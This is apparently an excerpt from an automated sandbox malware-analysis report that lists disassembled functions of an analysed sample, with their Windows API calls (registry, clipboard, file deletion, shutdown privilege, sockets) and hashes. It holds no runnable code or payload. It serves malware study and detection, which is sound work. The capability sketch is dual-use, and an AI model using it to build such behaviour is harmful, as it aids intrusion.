                                                  Function 00C403DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C40E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3FDAD,?,?), ref: 00C40E31
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C404AC
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C4054B
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C405E3
                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00C40822
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00C4082F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1240663315-0
                                                  • Opcode ID: 3e99c2765b63a274f93262fc6b3a16bb6ee2e99328e278ac8f3795260cd9ece4
                                                  • Instruction ID: 3fad3d0ca6341af97dc19a63ae5ed400c935aba75d9501319c01d9dcb9f7a95f
                                                  • Opcode Fuzzy Hash: 3e99c2765b63a274f93262fc6b3a16bb6ee2e99328e278ac8f3795260cd9ece4
                                                  • Instruction Fuzzy Hash: 6FE17F31604204AFCB14DF24C895E6ABBE5FF89714F14856DF95ADB2A2DB30ED01CB91
                                                  Function 00C34164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                  • String ID:
                                                  • API String ID: 1737998785-0
                                                  • Opcode ID: afad4d6db7be8ae041dd86c84f121e37dad996b72e819d512cff0fca296fd929
                                                  • Instruction ID: baf9196051a44cf5f28d9be221aa5e5bc8cbc9308f7c7e257541ae5720544838
                                                  • Opcode Fuzzy Hash: afad4d6db7be8ae041dd86c84f121e37dad996b72e819d512cff0fca296fd929
                                                  • Instruction Fuzzy Hash: 6821A1392006109FDB14AF24DC19BAE7BA8FF06751F11806DF946DB2A1DB70AD41CB54
                                                  Function 00C237EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BC4743,?,?,00BC37AE,?), ref: 00BC4770
                                                    • Part of subcall function 00C24A31: GetFileAttributesW.KERNEL32(?,00C2370B), ref: 00C24A32
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C238A3
                                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00C2394B
                                                  • MoveFileW.KERNEL32(?,?), ref: 00C2395E
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00C2397B
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C2399D
                                                  • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00C239B9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                  • String ID: \*.*
                                                  • API String ID: 4002782344-1173974218
                                                  • Opcode ID: 390eed6cf4dc75d37168e1e5293479a2f475d0772d9230ef60b05741b292c82d
                                                  • Instruction ID: adcaee630a32401b16292b55c429770a1fb2c29d2ea0cba1431b348333ff9a7a
                                                  • Opcode Fuzzy Hash: 390eed6cf4dc75d37168e1e5293479a2f475d0772d9230ef60b05741b292c82d
                                                  • Instruction Fuzzy Hash: F051903180519CAACF15FBA0E992EEDB7B9AF15300F6000ADE41677191EF756F49CB60
                                                  Function 00C2F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00C2F440
                                                  • Sleep.KERNEL32(0000000A), ref: 00C2F470
                                                  • _wcscmp.LIBCMT ref: 00C2F484
                                                  • _wcscmp.LIBCMT ref: 00C2F49F
                                                  • FindNextFileW.KERNEL32(?,?), ref: 00C2F53D
                                                  • FindClose.KERNEL32(00000000), ref: 00C2F553
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                  • String ID: *.*
                                                  • API String ID: 713712311-438819550
                                                  • Opcode ID: 51f4eeec3ad41171c5791ce3b71bb45854c28a6dcea91fc91831d7d0ba91249f
                                                  • Instruction ID: 3328d79ac899ba982b8ad4f4ffe2ea03543489cf59432e062d8c602af18b387a
                                                  • Opcode Fuzzy Hash: 51f4eeec3ad41171c5791ce3b71bb45854c28a6dcea91fc91831d7d0ba91249f
                                                  • Instruction Fuzzy Hash: AC414B7194021E9BCF14EF64DC49BEEBBB4FF15310F1445BAE815A2291DB709A86CF60
                                                  Function 00BD5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 374ee6cc1b426540d8f47349044112c4b88fe55a89528b4366cb153255ba4c10
                                                  • Instruction ID: b6d3a22d0852bff16fc931da0d5f6fb1851b6af9d028a17786a01916cdc79b57
                                                  • Opcode Fuzzy Hash: 374ee6cc1b426540d8f47349044112c4b88fe55a89528b4366cb153255ba4c10
                                                  • Instruction Fuzzy Hash: 8D127A70A00609DBDF14DFA5D981AEEB7F5FF48300F2045AAE806A7290EB75AD91DB50
                                                  Function 00C23B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BC4743,?,?,00BC37AE,?), ref: 00BC4770
                                                    • Part of subcall function 00C24A31: GetFileAttributesW.KERNEL32(?,00C2370B), ref: 00C24A32
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C23B89
                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C23BD9
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C23BEA
                                                  • FindClose.KERNEL32(00000000), ref: 00C23C01
                                                  • FindClose.KERNEL32(00000000), ref: 00C23C0A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                  • String ID: \*.*
                                                  • API String ID: 2649000838-1173974218
                                                  • Opcode ID: b4ba0a5456b32f309c7fc67758f16d5b8f53dfe63a6635106bb9b4df91ffc450
                                                  • Instruction ID: 2a9ea60e800dab7ded82692d79716b5f28229669d7732da379c4b7498a24693c
                                                  • Opcode Fuzzy Hash: b4ba0a5456b32f309c7fc67758f16d5b8f53dfe63a6635106bb9b4df91ffc450
                                                  • Instruction Fuzzy Hash: B9319E310083959BC301EF24D891EAFB7E8BE96310F404E6DF4E592191EF349A09CB63
                                                  Function 00C251BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C1882B
                                                    • Part of subcall function 00C187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C18858
                                                    • Part of subcall function 00C187E1: GetLastError.KERNEL32 ref: 00C18865
                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00C251F9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                  • String ID: $@$SeShutdownPrivilege
                                                  • API String ID: 2234035333-194228
                                                  • Opcode ID: 5c2b1bd6d501c8304a9586d803f59b544760e962d97d43d7ec003796a4231f6c
                                                  • Instruction ID: 79066dbc75239f9d822cc7dd8984fc4d1601f1dd779865e6a019cb184e3a076f
                                                  • Opcode Fuzzy Hash: 5c2b1bd6d501c8304a9586d803f59b544760e962d97d43d7ec003796a4231f6c
                                                  • Instruction Fuzzy Hash: 81012635795631ABF72C6278BC8AFBF7258EB06350F200435F927E28D2DE715D0195A0
                                                  Function 00C36283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C362DC
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C362EB
                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00C36307
                                                  • listen.WSOCK32(00000000,00000005), ref: 00C36316
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C36330
                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00C36344
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                  • String ID:
                                                  • API String ID: 1279440585-0
                                                  • Opcode ID: 0c16f1477b19bd68bf56314f7dcaa7acbab7b5a7333da1898b26c81c535c5299
                                                  • Instruction ID: 160b51c37bb21c48b4f27f31470e37c3c094eed81a245ded68bfb4c2a7be6e09
                                                  • Opcode Fuzzy Hash: 0c16f1477b19bd68bf56314f7dcaa7acbab7b5a7333da1898b26c81c535c5299
                                                  • Instruction Fuzzy Hash: FC21BB35600200AFDB10AF64C849B6EB7E9FF4A720F15816CE866A72E1CB70AD01DB51
                                                  Function 00C185B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C185E2
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00C185E9
                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C185F8
                                                  • CloseHandle.KERNEL32(00000004), ref: 00C18603
                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C18632
                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C18646
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                  • String ID:
                                                  • API String ID: 1413079979-0
                                                  • Opcode ID: 4dfb8ebe684d9690e12389c06d6924a7a07b660c00ea7f694b6965c75b5e2151
                                                  • Instruction ID: 2498c486d4f88a367357dd56ca1783de80b9b8ee983d5fc74c7238946a9a0453
                                                  • Opcode Fuzzy Hash: 4dfb8ebe684d9690e12389c06d6924a7a07b660c00ea7f694b6965c75b5e2151
                                                  • Instruction Fuzzy Hash: 6D119D7610420DABDF128FA4DC48FDE7BA9FF4A354F044028FE04A2160C7758E65EB60
                                                  Function 00BD5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BE0DB6: std::exception::exception.LIBCMT ref: 00BE0DEC
                                                    • Part of subcall function 00BE0DB6: __CxxThrowException@8.LIBCMT ref: 00BE0E01
                                                  • _memmove.LIBCMT ref: 00C10258
                                                  • _memmove.LIBCMT ref: 00C1036D
                                                  • _memmove.LIBCMT ref: 00C10414
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 1300846289-0
                                                  • Opcode ID: debfe80ae4e16c9fef46d7130c7f91c59958fbd9ddb0f1902b74498ce245d5f1
                                                  • Instruction ID: 7ff8203a7461ebaaa9798c3477712120c74453adacc751809f112b1f61662772
                                                  • Opcode Fuzzy Hash: debfe80ae4e16c9fef46d7130c7f91c59958fbd9ddb0f1902b74498ce245d5f1
                                                  • Instruction Fuzzy Hash: EA02BE70A00209DBCF14DF65D981AAEBBF5EF45300F6480A9E80ADB355EB74DE90DB91
                                                  Function 00BC1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623
                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 00BC19FA
                                                  • GetSysColor.USER32(0000000F), ref: 00BC1A4E
                                                  • SetBkColor.GDI32(?,00000000), ref: 00BC1A61
                                                    • Part of subcall function 00BC1290: DefDlgProcW.USER32(?,00000020,?), ref: 00BC12D8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ColorProc$LongWindow
                                                  • String ID:
                                                  • API String ID: 3744519093-0
                                                  • Opcode ID: 69f0b8f061f53329d644ee61088e800cbd5fedce438560df3861d3f3466a6341
                                                  • Instruction ID: 4958000f30b767b4e2205ae57718273c9ec6809d8563ec9dc3c38667cb2a84b8
                                                  • Opcode Fuzzy Hash: 69f0b8f061f53329d644ee61088e800cbd5fedce438560df3861d3f3466a6341
                                                  • Instruction Fuzzy Hash: 4FA15971106548BAEA28AB2D8CC4F7F35DCEF43341B14499EF613F6193CA60DD02A6B6
                                                  Function 00C2BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C2BCE6
                                                  • _wcscmp.LIBCMT ref: 00C2BD16
                                                  • _wcscmp.LIBCMT ref: 00C2BD2B
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00C2BD3C
                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00C2BD6C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                  • String ID:
                                                  • API String ID: 2387731787-0
                                                  • Opcode ID: 02da5029a444e45f2fde4d95bb91c7b1a11cb10c0454f550badb1feff4360cf4
                                                  • Instruction ID: c7849be68052bdb7e591a07ad286dd20cc346cc8bc52f5008bb994faca77c7df
                                                  • Opcode Fuzzy Hash: 02da5029a444e45f2fde4d95bb91c7b1a11cb10c0454f550badb1feff4360cf4
                                                  • Instruction Fuzzy Hash: 94518A356046129FD714DF28D491EAAB3E8FF4A320F10466DE966877A1DB30ED05CB91
                                                  Function 00C36747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C37D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C37DB6
                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C3679E
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C367C7
                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00C36800
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C3680D
                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00C36821
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 99427753-0
                                                  • Opcode ID: 9f3d7af0f437c96ed6fa061b47b2bafd287e0fc8690d7a6d333c126514b45ff0
                                                  • Instruction ID: ba738c03be59026c4c06fdcc2710383c7b40e29e074eed07f28fb4b2af1a14fc
                                                  • Opcode Fuzzy Hash: 9f3d7af0f437c96ed6fa061b47b2bafd287e0fc8690d7a6d333c126514b45ff0
                                                  • Instruction Fuzzy Hash: 5641A575A00210AFEB10BF648C86F6E77E8EF45754F4485ACF95AAB3D3CA709D018B91
                                                  Function 00C45376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                  • String ID:
                                                  • API String ID: 292994002-0
                                                  • Opcode ID: 449601772602d0f89176d00dc7eda3009f57770bef50eecf1987714182ebe6f3
                                                  • Instruction ID: 67492577be0b1fd4a9ba208e7c660bd5b01d02b9bd89b52f709b5448118a05c3
                                                  • Opcode Fuzzy Hash: 449601772602d0f89176d00dc7eda3009f57770bef50eecf1987714182ebe6f3
                                                  • Instruction Fuzzy Hash: EA11C435700911AFEB215F269C48F6F7B99FF457A1B41402DF856D7252CBB0DD028AA4
                                                  Function 00C180A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C180C0
                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C180CA
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C180D9
                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C180E0
                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C180F6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: 4c6c3af7f6f812b031dab592a91f6fced3ca9182b30d303f1d15e08495276c35
                                                  • Instruction ID: 95ee0b44e8888f9b8c0f89187938cda57c662d6ef0c00ae3cd638738332ef0fa
